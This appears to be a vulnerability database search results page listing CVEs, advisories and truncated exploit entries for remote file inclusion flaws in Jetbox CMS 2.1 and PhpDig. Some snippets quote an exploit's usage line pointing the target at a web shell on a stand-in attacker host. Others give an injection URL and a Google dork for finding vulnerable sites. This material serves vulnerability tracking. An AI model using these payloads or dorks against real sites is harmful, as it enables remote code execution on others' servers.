15 matches found
EUVD-2004-0068
Malware in sbrugna...
Jetbox CMS <= 2.1 (relative_script_path) Remote File Inclusion Exploit
No description provided by source. !/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.com/ The file...
CVE-2006-4422
PHP remote file inclusion vulnerability in includes/phpdig/libs/searchfunction.php in Jetbox CMS 2.1 allows remote attackers to execute arbitrary PHP code via a URL in the relativescriptpath parameter, a different vector than CVE-2006-2270. NOTE: this issue has been disputed, and as of 20060830,...
PT-2006-5223 · Phpdig +1 · Phpdig +1
Name of the Vulnerable Software and Affected Versions: Jetbox CMS version 2.1 Description: The issue concerns a remote file inclusion vulnerability. It allows remote attackers to execute arbitrary PHP code via a URL in the relative script path parameter. This is a different vector from a previous...
JetBox cms (search_function.php) Remote File Include
Found by : CarcaBot -- E-mail : CarcaBotx at Yahoo dot com -- $relativescriptpath.'/libs/htmlheader.php -- Exploit -- Google Dork: powered by Jetbox CMS -- http://www.sitename.com/path/includes/phpdig/libs/searchfunction.php?relative scriptpath=Evil Code -- Greets goes to : CarcaBot Administrator...
CVE-2006-4422
CVE-2006-4422 describes a PHP remote file inclusion in Jetbox CMS 2.1. The vulnerability affects includes/phpdig/libs/search_function.php via a URL in the relative_script_path parameter, enabling arbitrary PHP code execution. This CVE is noted as having a vector different from CVE-2006-2270 and i...
Jetbox CMS 2.1 - relative_script_path Remote File Inclusion
Jetbox CMS 2.1 - relativescriptpath Remote File Inclusion !/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.co...
Jetbox CMS 2.1 - 'relative_script_path' Remote File Inclusion
!/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.com/ The file jetbox/includes/phpdig/includes/config.php use...
[SA13422] PhpDig Unspecified Vulnerability
TITLE: PhpDig Unspecified Vulnerability SECUNIA ADVISORY ID: SA13422 VERIFY ADVISORY: http://secunia.com/advisories/13422/ CRITICAL: Moderately critical IMPACT: Unknown WHERE: From remote SOFTWARE: PhpDig 1.x http://secunia.com/product/2819/ DESCRIPTION: A vulnerability with an unknown impact has...
PhpDig < 1.8.5 Unspecified Vulnerability
The remote host is running phpDig, an open source search engine written in PHP. The remote version of this software is affected by a vulnerability that may allow an attacker to tamper with the integrity of the remote host. %NASLMINLEVEL 70300 C Tenable Network Security, Inc...
phpDig < 1.8.5 Unspecified Vulnerability
Binary data 2453.prm...
CVE-2004-0068
CVE-2004-0068 affects PhpDig
CVE-2004-0068
PHP remote file inclusion vulnerability in config.php for PhpDig 1.6.5 and earlier allows remote attackers to execute arbitrary PHP code by modifying the $relativescriptpath parameter to reference a URL on a remote web server that contains the code...
PhpDig 1.6.x: remote command execution
Product: PhpDig 1.6.x Vendor: phpdig.net Author: FraMe frame at kernelpanik.org URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. Details 4. Patches. 1. Overview. PhpDig is a http spider/search engine written in Php with a MySql database in backend. PhpDig builds a glossary...
PhpDig config.php relative_script_path Parameter Remote File Inclusion
The remote host is running phpdig, an http search engine written in PHP. There is a flaw in this product that could allow an attacker to execute arbitrary PHP code on this by forcing this set of CGI to include a PHP script hosted on a third-party host. %NASLMINLEVEL 70300 C Tenable Network...